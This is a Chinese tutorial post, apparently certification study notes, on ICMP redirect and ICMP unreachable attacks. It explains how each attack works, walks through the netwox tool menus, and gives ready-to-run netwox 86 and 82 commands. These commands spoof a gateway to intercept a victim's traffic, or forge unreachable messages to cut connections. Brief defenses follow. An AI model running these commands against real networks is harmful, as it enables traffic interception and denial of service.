HCIE-Security安全-ICMP重定向、不可达攻击
文章目录
- ICMP重定向攻击
- 攻击原理
- 攻击过程
- 攻击代码
- 防御措施
- ICMP不可达攻击
- 攻击原理
- 攻击代码
- 防御措施
ICMP重定向攻击
攻击原理
利用网关的身份,向被攻击主机发送ICMP重定向数据包,告诉它“你去下一个目标的下一跳是我”,于是被攻击主机在访问目标的时候其流量会重定向到攻击方,由此攻击方则可以进行数据的截获。
注意:
攻击者一定要有网关的身份(将源IP地址设置为网关的地址,添加新的网关为攻击者的IP地址),因为被攻击主机只会听网关的话。
攻击过程
A要去访问B,本来A的下一跳是网关R2,但是现在攻击者C向A发送一个ICMP重定向数据包,包中的信息为“源IP地址为网关R1IP地址(冒充网关R1的身份),伪造的网关地址为攻击者的IP地址”,A收到该数据包,发现这是我的boss(网关R1)给我发的报文,我必须要听它的,于是则会将自己的网关改为攻击者的IP地址,由此每当A要访问B时流量则会经过C,而C则可以对数据进行截获。
ICMP重定向的netwox工具为86
kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.######################## MAIN MENU #########################0 - leave netwox3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + informationb + network protocolc + application protocold + sniff (capture network packets)e + spoof (create and send packets)f + record (file containing captured packets)g + clienth + serveri + ping (check if a computer if reachable)j + traceroute (obtain list of gateways)k + scan (computer and port discovery)l + network auditm + brute force (check if passwords are weak)n + remote administrationo + tools not related to network
Select a node (key in 03456abcdefghijklmno): b##################### network protocol #####################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + Ethernetb + IPc + UDPd + TCPe + ICMPf + ARP
Select a node (key in 0123456abcdef): e########################### ICMP ###########################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + ICMP spoofb + ICMP serverc + network audit using ICMP
Select a node (key in 0123456abc): c################# network audit using ICMP #################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda - 73:Simulate presence of a/several computer/s (arp and ping)b - 81:Send an ICMP4 timestampc - 82:Sniff and send ICMP4/ICMP6 destination unreachabled - 83:Sniff and send ICMP4/ICMP6 time exceedede - 84:Sniff and send ICMP4/ICMP6 parameter problemf - 85:Sniff and send ICMP4 source quenchg - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): g################# help for tool number 86 ##################
Title: Sniff and send ICMP4/ICMP6 redirect
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 86 [-d device] [-f filter] -g ip [-s spoofip] [-c uint32] [-i ip]
Parameters:-d|--device device device name {Eth0}-f|--filter filter pcap filter-g|--gw ip new gateway {192.168.248.129}-s|--spoofip spoofip IP spoof initialization type {linkbraw}-c|--code uint32 ICMP code {0}-i|--src-ip ip source IP address {192.168.248.129}
Example: netwox 86 -g "192.168.248.129"
Example: netwox 86 --gw "192.168.248.129"
Press 'r' or 'k' to run this tool, or any other key to continue
攻击代码
netwox 86 -f "host 192.168.248.2 "–gw “192.168.249.129” -i "192.168.249.254"
//给目标地址192.168.248.2一个新的网关地址192.168.248.129,以目前网关的名义发出。
-f : 写要攻击的目标主机IP地址
–gw :写要添加的伪造的网关,即攻击者的IP地址
-i :写真正的网关地址
防御措施
禁止网关发出重定向消息,主机不处理重定向消息。
ICMP不可达攻击
攻击原理
攻击者伪造一个ICMP不可达的报文发送给被攻击主机,包含的信息有被攻击主机所要访问的服务器IP地址、目标端口、被攻击主机的IP地址等。
ICMP不可达报文netwox工具为82号
root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.######################## MAIN MENU #########################0 - leave netwox3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + informationb + network protocolc + application protocold + sniff (capture network packets)e + spoof (create and send packets)f + record (file containing captured packets)g + clienth + serveri + ping (check if a computer if reachable)j + traceroute (obtain list of gateways)k + scan (computer and port discovery)l + network auditm + brute force (check if passwords are weak)n + remote administrationo + tools not related to network
Select a node (key in 03456abcdefghijklmno): b##################### network protocol #####################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + Ethernetb + IPc + UDPd + TCPe + ICMPf + ARP
Select a node (key in 0123456abcdef): e########################### ICMP ###########################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + ICMP spoofb + ICMP serverc + network audit using ICMP
Select a node (key in 0123456abc): c################# network audit using ICMP #################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda - 73:Simulate presence of a/several computer/s (arp and ping)b - 81:Send an ICMP4 timestampc - 82:Sniff and send ICMP4/ICMP6 destination unreachabled - 83:Sniff and send ICMP4/ICMP6 time exceedede - 84:Sniff and send ICMP4/ICMP6 parameter problemf - 85:Sniff and send ICMP4 source quenchg - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): c################# help for tool number 82 ##################
Title: Sniff and send ICMP4/ICMP6 destination unreachable
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 82 [-d device] [-f filter] [-c uint32] [-i ip] [-s spoofip]
Parameters:-d|--device device device name {Eth0}-f|--filter filter pcap filter-c|--code uint32 ICMP code {0}-i|--src-ip ip source IP address {192.168.248.129}-s|--spoofip spoofip IP spoof initialization type {linkbraw}
Example: netwox 82
Press 'r' or 'k' to run this tool, or any other key to continue
攻击代码
netwox 82 -f “host 100.1.1.1 and port 80” -i "192.168.248.2"
//伪造一个ICMP不可达给被攻击主机
-f :服务器的IP地址,可以加上端口号
-i :被攻击者的IP地址
防御措施
增加服务断开的判断机制,做多重判断,不能仅从ICMP不可达来判断失去连接从而断开服务。
这个只能依靠linux内核的升级、开发者、操作系统、应用程序来修补该漏洞。
HCIE-Security安全-ICMP重定向、不可达攻击相关推荐
- 实现ICMP重定向攻击
环境:攻击机Ubuntu 18 ,受攻击机Windows7 一.使用netwox体会实验效果,netwox发出的ICMP重定向包的目的IP是受害者的IP,也即,netwox先抓到受害者的数据包,根据捕 ...
- 实验一:ICMP重定向攻击
文章目录 一.实验原理: 二.实验目标: 三.实验内容 (一).用netwox86号功能进行测试 (二).raw socket自己实现ICMP重定向 1.实现过程: 四.实验结果: 五.附录 1.函数 ...
- 如何理解路由中的IP选路,修改,ICMP重定向差错?—Vecloud微云
路由的IP选路如下: 一.搜索路由表的优先级:包含主机地址.网络地址.默认路由: 二.路由表:一个典型的路由表如下: Flags各项的含义: U 该路由可用 G 该路由是一个网关,如果没有该标志,则是 ...
- ICMP协议和ICMP重定向详解
ICMP协议 internet消息控制协议(ICMP)指定了多种消息类型,这些消息的共同目的就是管理网络,详见RFC792.ICMP的消息可以分为错误消息.请求消息和响应消失.ICMP数据包格式如图所 ...
- ICMP重定向(ICMP Redirect)
网络中的路由器通过相互之间的共同努力,将用户的数据包转发到目的地.通常情况下,主机都会将去往远程网络的数据包发送到路由器,路由器再尽最大努力转发数据.但是在某些情况下,收到数据包的路由器可能并不是去 ...
- ICMP重定向数据包分析
一.实验目的 理解ICMP重定向的功能 二.实验拓扑 三.实验工具 GNS3和Wireshark抓包分析软件 四.ICMP协议的封装格式 (1)Type 类型值,标识ICMP分组类型 (2)Code ...
- linux icmp 重定向,icmp重定向
icmp虽然不是路由协议,但是有时它也可以指导数据包的流向(使数据流向正确的网关)?icmp协议通过icmp重定向数据包(类型5?代码0:网络重定向)达到这个目的? 图3icmp重定向 如图3所示,主 ...
- icmp重定向实验ensp_ICMP重定向案例
ICMP重定向报文是ICMP控制报文中的一种.在特定的情况下,当路由器检测 到一台机器使用非优化路由的时候,它会向该主机发送一个ICMP重定向报文,请求主机改变路由.路由器也会把初始数据报向它的目的地 ...
- 浅析Icmp原理及隐蔽攻击的方式
一.ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议.它是TCP/IP协议簇的一个子协议,用于在IP主机.路由器 ...
最新文章
- find命令应用详解
- 系列TCP/IP协议-动态IP选路协议(008)
- SpringBoot邮件服务
- Spring Boot 学习之路二 配置文件 application.yml
- 【HDOJ】【3415】Max Sum of Max-K-sub-sequence
- 母亲节微信公众号走心文章就用来逗编辑器排版
- 阳光动力2号太阳能飞机的基本工作原理
- 深度强化学习之A3C网络—理论及代码(小车上山)
- seL4微内核操作系统初期总结 2018.10
- 中尺度海洋涡流对热带气旋强度影响的调查
- 如何把视频语音转换成文字呢?
- SDHC (High Capacity SD Memory Card)
- 数组转这种格式 county_list:{ 110101: “东城区“, 110102: “西城区“, 110105: “朝阳区“, 110106: “丰台区“,
- 优秀前端工程师必备: checkbox radio--单钩 多钩 大比较:你是♂||♀ , 还是 ♂♀...
- C++ 高级程序设计
- 人们从诗人的字句里选取自己心爱的意义但诗句的最终意义是指向你
- 小程序API的Promise化
- python读写文件的语句_用Python读写文件指南
- Hive正则表达式regexp_replace,截取后提取_汉字_字母_数字
- 随机点名小程序 tkinter